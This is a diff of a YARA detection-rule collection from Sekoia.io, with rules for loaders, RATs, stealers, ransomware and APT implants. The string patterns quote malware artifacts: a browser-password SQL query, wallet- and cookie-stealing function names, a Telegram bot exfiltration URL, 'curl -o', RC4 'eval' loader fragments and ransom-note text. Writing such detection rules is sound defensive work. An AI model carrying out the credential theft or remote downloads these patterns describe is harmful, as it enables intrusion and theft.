+		$api_hash3 = {38 68 0D 16}
+		$api_hash4 = {40 DE CE 72}
+		$api_hash5 = {08 87 1D 60}
+		$api_hash6 = {26 C6 0B 1B}
+		$api_hash7 = {0C DC 67 55}
+		$api_hash8 = {AA C5 E2 5D}
+		$api_hash9 = {C6 96 87 52}
+		$api_hash10 = {F8 8E C2 92}
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and pe.number_of_sections == 7 and all of ( $s* ) and 1 of ( $api_hash* )
 }
-rule SEKOIA_Apt_Konni_Dropper : FILE
+rule SEKOIA_Win_Loader_Astasialoader_Strings : FILE
 {
 	meta:
-		description = "Detects Konni dropper used when distributed via malicious document"
+		description = "AstasiaLoader strings"
 		author = "Sekoia.io"
-		id = "0783a55e-1d1e-40ca-a661-2c5dec6d78d6"
-		date = "2023-11-27"
+		id = "8dfabf28-4b5a-43db-87e9-5b9080541ec3"
+		date = "2023-08-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_konni_dropper.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_loader_astasialoader_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6d1b1f5ccbdc20908891e5f40ceb85c251b1ca2a395fa4b106e63718c6393a22"
+		hash = "44b6f7508a82ff6a4d65defc189303eeee393b5fd498de73d74d0a2c75c87401"
+		logic_hash = "02a7bed506865d761ec03b8de4b7fc636b71f48c62e933013f2ffa23deabb62e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242155,26 +241914,30 @@ rule SEKOIA_Apt_Konni_Dropper : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "UnzipAFile"
-		$ = "check.bat"
-		$ = "FOF_SILENT"
-		$ = "fLieObj"
+		$s1 = "newuploaders" wide
+		$s2 = "\\infected.exe" wide
+		$s3 = "AstasiaLoader" wide
+		$s4 = "Astasia.pdb" ascii
+		$s5 = "ip-api.com/line/?fields=hosting" wide
+		$s6 = "https://api.telegram.org/bot" wide
+		$s7 = "currentscript.txt" wide
+		$s8 = "sessionlog.txt" wide
 
 	condition:
-		filesize < 1MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 1MB and 5 of them
 }
-rule SEKOIA_Apt_Coathanger_Beacon : FILE
+rule SEKOIA_Loader_Win_Gcleaner : FILE
 {
 	meta:
-		description = "Detects COATHANGER beacon"
+		description = "Detect the GCleaner loader using specific strings"
 		author = "Sekoia.io"
-		id = "cc201479-016a-46d2-a9e2-41b4914ce618"
-		date = "2024-02-07"
+		id = "0c085da3-ec77-4141-a927-bef1578a6dee"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_coathanger_beacon.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_gcleaner.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e44496e62de8c885d5bd941819a97f4c0dd90ce2d0cfe9d042ab9590cc354ddb"
+		logic_hash = "f38aaab2911e4e901780bb6df2c58f02fa80d3e39fb56f60072285d0a929ba23"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242182,56 +241945,81 @@ rule SEKOIA_Apt_Coathanger_Beacon : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {
-        48 B8 47 45 54 20 2F 20 48 54
-        48 89 45 B0 48 B8 54 50 2F 32 0A 48 6F 73
-        48 89 45 B8 48 B8 74 3A 20 77 77 77 2E 67
-        48 89 45 C0 48 B8 6F 6F 67 6C 65 2E 63 6F
-        }
+		$str01 = "G-Cleaner can clean unneeded files, settings, and Registry entries" ascii
+		$str02 = "3.  Click \"Run G-Cleaner\"" ascii
+		$str03 = "Garbage_Cleaner" ascii
+		$str04 = "GCleaner.Properties" ascii
+		$str05 = "SOFTWARE\\GCleaner\\Install" wide
+		$str06 = "SOFTWARE\\GCleaner\\Trial" wide
+		$str07 = "SOFTWARE\\GCleaner\\License" wide
+		$str08 = "G-Cleaner activation" wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 5MB and any of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-
-rule SEKOIA_Installer_Win_Minibus : FILE
+rule SEKOIA_Apt_Mustangpanda_Payload : FILE
 {
 	meta:
-		description = "Detect MINIBUS installer"
+		description = "Decryption routine of mustang panda payload"
 		author = "Sekoia.io"
-		id = "0f7f600d-d93b-4b5a-aa0e-7d91038409e6"
-		date = "2024-04-08"
+		id = "ce7ddf20-e13f-4b5f-8fff-4b1387b29568"
+		date = "2022-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/installer_win_minibus.yar#L4-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_payload.yar#L1-L42"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "24326c9f5dcb7e66d47b65bf6bec6fe78be18c8d41a3039fbd09b453568a3f8f"
+		logic_hash = "734d42aed4574de620773f1f2d08c6b1fc206efd1b576f0f3679edcc0b2ce91d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "26ca51cb067e1fdf1b8ad54ba49883bc5d1945952239aec0c4840754bff76621"
-		hash2 = "90fa29cc98be1d715df26d22079bdb8ce1d1fd3ce6a4efb39a4c192134e01020"
 
 	strings:
-		$ = "\\essential.dat"
-		$ = "TorvaldInitial.dll"
+		$chunk_1 = {
+        89 74 24 ??
+        B9 ?? ?? ?? ??
+        8B 44 24 ??
+        3D ?? ?? ?? ??
+        B8 ?? ?? ?? ??
+        0F 4C C1
+        E9 ?? ?? ?? ??
+        B8 ?? ?? ?? ??
+        31 DB
+        31 ED
+        31 FF
+        E9 ?? ?? ?? ??
+        8B 44 24 ??
+        B9 ?? ?? ?? ??
+        3B 44 24 ??
+        B8 ?? ?? ?? ??
+        0F 42 C1
+        E9 ?? ?? ?? ??
+        88 5C 24 ??
+        89 6C 24 ??
+        89 7C 24 ??
+        B9 ?? ?? ?? ??
+        8B 44 24 ??
+        3D ?? ?? ?? ??
+        B8 ?? ?? ?? ??
+        0F 4C C1
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" )
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Implant_Win_Geacon : FILE
+rule SEKOIA_Rat_Win_Millenium : FILE
 {
 	meta:
-		description = "Finds Geacon samples based on specific strings"
+		description = "Finds MilleniumRAT samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "064eabe0-aee5-4e5e-9f5e-69b32b1ba0da"
-		date = "2024-01-11"
+		id = "91320924-5c74-457a-8601-29c4e4034761"
+		date = "2023-11-16"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_geacon.yar#L1-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_millenium.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "74b0d2fbb8b7f6666543ba4fdfd9f9d2064d3a89d21c90d794b57f0009199fea"
+		logic_hash = "bcf4158b9bfee65cd9bd74163ac108ea1de8ec0e9ad066e77bec788ae6fb7283"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242239,40 +242027,37 @@ rule SEKOIA_Implant_Win_Geacon : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gea01 = "geacon/config.init" ascii
-		$gea02 = "geacon_pro-master/config/config.go" ascii
-		$gea03 = "geacon_plus-main/config/config.go" ascii
-		$gea04 = "command type %d is not support by geacon now" ascii
-		$gea05 = "main/sysinfo.GeaconID" ascii
-		$str01 = "command.StealToken" ascii
-		$str02 = "command.MakeToken" ascii
-		$str03 = "command/misc.go" ascii
-		$str04 = "config/c2profile.go" ascii
-		$str05 = "crypt.AesCBCDecrypt" ascii
-		$str06 = "packet.File_Browse" ascii
-		$str07 = "packet.FirstBlood" ascii
-		$str08 = "packet.ParseCommandShell" ascii
-		$str09 = "packet.ParseCommandUpload" ascii
-		$str10 = "packet.PushResult" ascii
-		$str11 = "sysinfo.GetComputerName" ascii
-		$str12 = "sysinfo.IsOSX64" ascii
-		$str13 = "util..inittask" ascii
+		$str01 = "Millenium RAT, version:" wide
+		$str02 = "Coded by @shinyenigma" wide
+		$str03 = "*gift*<NEW TOKEN>*<NEW CHAT ID>*<message> - gift this bot to another user, his telegram bot has to be started" wide
+		$str04 = "*historyForce - grab more browser history by killing browser processes, use carefully" wide
+		$str05 = "*download - victim`s PC downloads a file attached to this message, if it is a picture it should also be attached as a file" wide
+		$str06 = "No keylogs recorded!" wide
+		$str07 = "Successfully added RAT to startup" wide
+		$str08 = "You`ve gifted gifted a bot:" wide
+		$str09 = "Incorrect agrument, please enter 0/90/180/270" wide
+		$str10 = "SELECT action_url, username_value, password_value FROM logins" wide
+		$str11 = "Yandex\\YandexBrowser\\User Data\\Default" wide
+		$str12 = "Millenium-rat-CSharp (main project)" ascii
+		$str13 = "get_BatteryLifePercent" ascii
+		$str14 = "get_ExpirationMonth" ascii
+		$str15 = "sqlite3_extension_init " ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
+		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Main : FILE
+rule SEKOIA_Apt_Tortoiseshell_Imaploader : FILE
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detects IMAPLoader malware"
 		author = "Sekoia.io"
-		id = "99983df5-89d6-4fac-81e6-16e5ab20bde3"
-		date = "2023-05-15"
+		id = "e1706b59-5c94-4fbf-8560-0022ca631d1d"
+		date = "2023-11-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_main.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tortoiseshell_imaploader.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9bcfd6e9e150399c7f11abc41205119ddf24ea0fef5816ed905cd9b1e9ec5c1e"
+		logic_hash = "93f57940ed69145064e5153cc9b099fb9456116cae808acfb4e6f7f14003dde7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242280,53 +242065,48 @@ rule SEKOIA_Apt_Badmagic_Commonmagic_Main : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "graph.microsoft.com" ascii wide
-		$ = "children?select=name,size" ascii wide fullword
-		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
+		$s1 = "yandex.com"
+		$s2 = "saveImapMessage.pdb"
+		$s3 = "downloader"
+		$s4 = "MailServer.Auth"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader_Encoded : FILE
+
+rule SEKOIA_Backoor_Win_Gobear
 {
 	meta:
-		description = "Detects encoded version of Gamaredon LNK USB Spreader"
+		description = "Detect the GoBear backdoor used by Kimsuky"
 		author = "Sekoia.io"
-		id = "e42bb654-d1aa-4219-b3da-dd4053d59a83"
-		date = "2023-06-19"
+		id = "f922bf1b-652e-4a2f-91e9-76ecd2e3bf6a"
+		date = "2024-02-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader_encoded.yar#L1-L19"
+		reference = "https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backoor_win_gobear.yar#L4-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01"
-		logic_hash = "81ab55330b3003cb698ade7e14eaea5fb03e5d2d3dd310b7db682aeef9b51f6e"
+		logic_hash = "8ca2699058ded62cbf4b78040985a4e5ebce0a1ff94034206c81a4c8e91f479b"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" ascii
-		$s2 = " 1000000){" base64
-		$s3 = "+\"\\$" base64
-		$s4 = ",3\";" base64
-
 	condition:
-		$s1 at 0 and 3 of them and filesize < 4000
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "668031f53390dc749971888029911c12d4171534f77c17a962e698bf121d0e20" )
 }
-rule SEKOIA_Loader_Win_Fudloader : FILE
+rule SEKOIA_Infostealer_Win_Edgeguard : FILE
 {
 	meta:
-		description = "Finds FUD-Loader samples based on specific strings"
+		description = "Finds EdgeGuard Stealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "4c2ac614-89af-4449-9fd2-9f935e4c27b8"
-		date = "2023-09-25"
+		id = "bbdb362f-d235-48f8-8fa5-d340d4e3e3f0"
+		date = "2023-08-22"
 		modified = "2024-12-19"
-		reference = "https://github.com/0day2/FUD-Loader/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_fudloader.yar#L1-L24"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_edgeguard.yar#L1-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bf19169963cfcbcf41a2dc5f9447738e957878972590b2a8d310eed1c54f3676"
+		logic_hash = "11396aea2e166456ec8311f95a8037aac41f69caf3158f8c19cb0c38327842d6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242334,30 +242114,40 @@ rule SEKOIA_Loader_Win_Fudloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "set_WindowStyle" ascii
-		$str02 = "set_FileName" ascii
-		$str03 = "get_StartInfo" ascii
-		$str04 = "GetRandomFileName" ascii
-		$str05 = "DownloadFile" ascii
-		$str06 = "GetTempPath" ascii
-		$str07 = "ProcessStartInfo" ascii
-		$str08 = "System.Diagnostics" ascii
+		$str01 = "main.downloadnecessary" ascii
+		$str02 = "main.extractchromepasswords" ascii
+		$str03 = "main.extracttasksch" ascii
+		$str04 = "main.BrowserDownloadsViewExtract" ascii
+		$str05 = "main.stealmetamask" ascii
+		$str06 = "main.stealexoduswallet" ascii
+		$str07 = "main.moveatomic" ascii
+		$str08 = "main.movefirefoxcookies" ascii
+		$str09 = "main.movepasswords" ascii
+		$str10 = "main.FinallyZIPIPFolder" ascii
+		$str11 = "edgeguard.business" ascii
+		$str12 = "/License.XenArmor" ascii
+		$str13 = "/TaskSchedulerView.exe" ascii
+		$str14 = "/BrowsingHistoryView.exe" ascii
+		$str15 = "/outlookfiles/starter.exe" ascii
+		$str16 = "/outlookfiles/External.zip" ascii
+		$str17 = "/outlookfiles/XenManager.dll" ascii
+		$str18 = "/outlookfiles/EmailPasswordRecoveryPro.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and filesize < 10KB
+		uint16( 0 ) == 0x5a4d and 10 of ( $str* )
 }
-rule SEKOIA_Apt_Stripedfly : FILE
+rule SEKOIA_Infostealer_Win_Lumma_Strings_Aug23 : FILE
 {
 	meta:
-		description = "Detects string relative to Stripedfly malware"
+		description = "Finds Lumma samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "81968d34-3247-4965-ba44-55747370c90e"
-		date = "2023-11-30"
+		id = "728f7825-a463-4b19-b2d3-3460e4c06dc9"
+		date = "2023-09-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_stripedfly.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_lumma_strings_aug23.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ded64ae30cf994162d4af649a34eadd4b8619cbced4392a6684129f8cf906136"
+		logic_hash = "704a31b0f7c30602305768f13bf6108ebaf08c62451833731d2f2f020efce386"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242365,51 +242155,61 @@ rule SEKOIA_Apt_Stripedfly : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "{\"id\":%d,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":%s}"
-		$s2 = "{\"login\":\"%s\",\"pass\":\"%s\",\"agent\":\"\"}"
-		$s3 = "(tcp|ssl)://([A-Za-z0-9\\.\\-]+):([0-9]+)"
+		$str01 = "lid=%s&j=%s&ver" ascii
+		$str02 = "%s (%d.%d.%d)" ascii
+		$str03 = "- Screen Resoluton:" ascii
+		$str04 = "- Physical Installed Memory:" ascii
+		$str05 = "Content-Type: attachment/x-object" ascii
+		$str06 = "Content-Type: application/x-www-form-urlencoded" ascii
+		$str07 = "Content-Type: multipart/form-data; boundary=%s" wide
+		$str08 = "SysmonDrv" wide
+		$str09 = "TeslaBrowser/5.5" wide
 
 	condition:
-		filesize < 3MB and 2 of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Win_Malware_Janelarat_Strings : FILE
+
+rule SEKOIA_Apt_Mustangpanda_Maliciousdll_Loading_Plugx_Strings
 {
 	meta:
-		description = "Detect the JanelaRAT malware"
+		description = "Detects MustangPanda malicious DLL"
 		author = "Sekoia.io"
-		id = "891f182e-8a7a-4d0c-a481-62c198bb901b"
-		date = "2023-08-11"
+		id = "2296ac6e-63f5-4cff-aeb7-2c5205e6f559"
+		date = "2023-12-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_malware_janelarat_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_maliciousdll_loading_plugx_strings.yar#L3-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "00df0a1f037e24ff1528d524fb7398735e2c3e0a9995a9f95a5293b04748f06e"
-		logic_hash = "cf2ca92cf790211f69ea9645f1c1b865d5503d14a1dcce535b4a69c735ea3dad"
+		hash = "651c096cf7043a01d939dff9ba58e4d69f15b2244c71b43bedb4ada8c37e8859"
+		logic_hash = "667901d36585248a891b90ff8ed7006030151fbbbe0d4a85570944a94edba7f8"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s2 = {4d 58 4e 4f 42 55 47 4d 41 47}
-		$s1 = "block.blq" wide
+		$ = "VirtualAlloc"
+		$ = "VirtualFree"
+		$ = "VirtualProtect"
+		$ = "VirtualQuery"
+		$ = "GCC: (MinGW-W64"
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 1MB and 2 of them
+		pe.exports( "MsiProvideQualifiedComponentW" ) and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_5 : FILE
+rule SEKOIA_Tool_Efspotato : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "cb4d266e-f2b7-4642-a223-57180e66a9a6"
-		date = "2023-02-03"
+		id = "4440ea37-d7d0-4107-867c-576c6e2f4f7e"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_5.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_efspotato.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a68342b5bb2622deb71432da85cc249f35ca5b7b5dc70e069d6dcb6e9488e97e"
+		logic_hash = "cbfd72a16f02903b1ad6fdf3e25f6c5508145d6be4c1776bb77f1ccd6c1954b3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242417,27 +242217,25 @@ rule SEKOIA_Generic_Sharpshooter_Payload_5 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rc4 = function(key, str)"
-		$ = "<job id=\"JS Code\""
-		$ = "var e={},i,b=0,c,x,l=0,a,r="
-		$ = "var plain = rc4("
-		$ = "eval(plain);"
+		$s1 = "usage: EfsPotato <cmd> [pipe]" ascii wide
+		$s2 = "Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability)." ascii wide
+		$s3 = "Part of GMH's fuck Tools, Code By zcgonvh." ascii wide
 
 	condition:
-		all of them and filesize < 2MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Apt_Ir_Sugarush_Implant : FILE
+rule SEKOIA_Apt_Apt35_Iisraid_Strings : FILE
 {
 	meta:
-		description = "Detects the SUGARUSH implant"
+		description = "Detects APT35s ISSRaid implant"
 		author = "Sekoia.io"
-		id = "bcf057cc-272c-4cb6-bb76-928788675282"
-		date = "2022-08-23"
+		id = "ee42f406-0c7e-4385-9098-409611dbe0a5"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ir_sugarush_implant.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt35_iisraid_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0d249552013c29ce1eb66dca2d93e5cde0a1b0fb80aae55469bec3bda224be91"
+		logic_hash = "de2ebef5ab46136aa54b146dbd4198f69801f3414d1d239fc7983c5b3c0115c4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242445,54 +242243,59 @@ rule SEKOIA_Apt_Ir_Sugarush_Implant : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "You are offline at " wide
-		$ = "\\Logs\\ServiceLog_" wide
-		$ = "Service is recall at" wide
-		$ = "add_OutputDataReceived" ascii
-		$ = "get_CurrentDomain" ascii
+		$ = "CHttpModule::"
+		$ = "X-Forward-Verify"
+		$ = "X-Beserver-Verify"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharptongue_Strings : FILE
+rule SEKOIA_Ransomware_Linux_Icefire_2023 : FILE
 {
 	meta:
-		description = "Detects SharpTongue variants."
+		description = "Rule to detect Linux IceFire ransomware samples."
 		author = "Sekoia.io"
-		id = "56027edb-4e6e-40ec-a1b9-36c52b0dd3ec"
-		date = "2022-07-29"
+		id = "b04964f4-3fdc-4745-9f4a-95a5a79bc7e1"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharptongue_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_linux_icefire_2023.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a7a9045485f6e713a8ae1bc87cd1296d64905b18e5d13d6e2b9a95328181af54"
+		logic_hash = "25033bd33311b070809d150f60803f32011d78a6a74d6b5f620a3216f0f95a6e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e9cc7fdfa3cf40ff9c3db0248a79f4817b170f2660aa2b2ed6c551eae1c38e0b"
 
 	strings:
-		$s1 = "Post0.Open" ascii wide
-		$s2 = ".php?op=" ascii wide
-		$s3 = "s=s&Mid(c,ix*d+jx+1,1)" ascii wide
-		$s4 = "curl -o " ascii wide
+		$string01 = "********************Your network has been infected!!!********************"
+		$string02 = "IMPORTANT : DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED!!!"
+		$string03 = "username:"
+		$string04 = "password:"
+		$string05 = ".cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb"
+		$string06 = "./boot./dev./etc./lib./proc./srv./sys./usr./var./run"
+		$string07 = "/iFire-readme.txt"
+		$string08 = ".iFire"
+		$string09 = "iFire.pid"
 
 	condition:
-		$s2 in ( @s1 .. @s1 + 200 ) or $s2 in ( @s4 .. @s4 + 200 ) or $s3 and filesize < 500KB
+		uint32be( 0 ) == 0x7F454C46 and all of them
 }
-rule SEKOIA_Apt_Toddycat_Toddybox_Strings : FILE
+rule SEKOIA_Apt_Cerana_Keeper_Dropboxflop : FILE
 {
 	meta:
-		description = "Detects ToddyCat's ToddyBox binary"
+		description = "Detects DropboxFlop malware"
 		author = "Sekoia.io"
-		id = "fde3df24-ebd7-4327-998e-bddaa08835da"
-		date = "2023-11-20"
+		id = "e077901f-3847-45f3-82cb-d52724cd3fb5"
+		date = "2024-10-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toddycat_toddybox_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cerana_keeper_dropboxflop.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b71fad12d4485268cbeff98b8a8d6067ac8f62164be60cdb61f3f37ab471a247"
+		hash = "2b65b74e52fbf25cb400dbdfcd1a06a7"
+		logic_hash = "5b2dfdf0c35f574e7006bb3e6eafa10d0e7fc7d980d443b31d4d6d6b7cec2fce"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242500,79 +242303,49 @@ rule SEKOIA_Apt_Toddycat_Toddybox_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Wait a while to upload the next file..."
-		$ = "[-] Error Msg: %s"
-		$ = "[-] Error Msg: Connect Errors or Proxy Errors"
-		$ = "[-] arg missing!"
